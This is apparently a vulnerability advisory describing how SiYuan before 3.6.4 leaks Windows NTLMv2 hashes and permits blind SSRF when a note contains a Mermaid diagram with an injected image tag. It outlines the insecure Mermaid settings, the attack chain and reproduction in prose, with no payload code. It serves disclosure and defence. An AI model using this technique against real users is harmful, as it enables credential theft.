SiYuan Zero-Click NTLM Hash Theft and Blind SSRF Vulnerability via Mermaid Diagram Rendering

A vulnerability in SiYuan versions prior to 3.6.4 allows for zero-click theft of NTLMv2 hashes on Windows systems, alongside blind server-side request forgery (SSRF) from the victim's machine. This issue arises because SiYuan configures Mermaid.js with 'securityLevel: loose' and 'htmlLabels: true', enabling <img> tags with src attributes to bypass internal sanitization and be injected into the DOM as part of an SVG. When a note containing a malicious Mermaid diagram is opened, the Electron client fetches the image URL. On Windows, this protocol-relative URL is resolved as a UNC path, automatically triggering SMB authentication and sending the victim's NTLMv2 hash to the attacker.

Impact

Exploitation leads to unauthorized access to the victim's NTLMv2 hash, which can be cracked offline or used in relay attacks. The vulnerability also creates a blind SSRF condition, with the victim's machine making an unsolicited request to an external server.

Reproduction

To reproduce this vulnerability, create a note in SiYuan with a Mermaid code block that includes an image tag pointing to an external server. When the note is opened, SiYuan will render the diagram and inject the SVG into the DOM. On Windows, the image request will be resolved as a UNC path, triggering the automatic SMB authentication that sends the NTLMv2 hash to the attacker.

Remediation

Users can update to SiYuan version 3.6.4 or later, where this vulnerability has been fixed.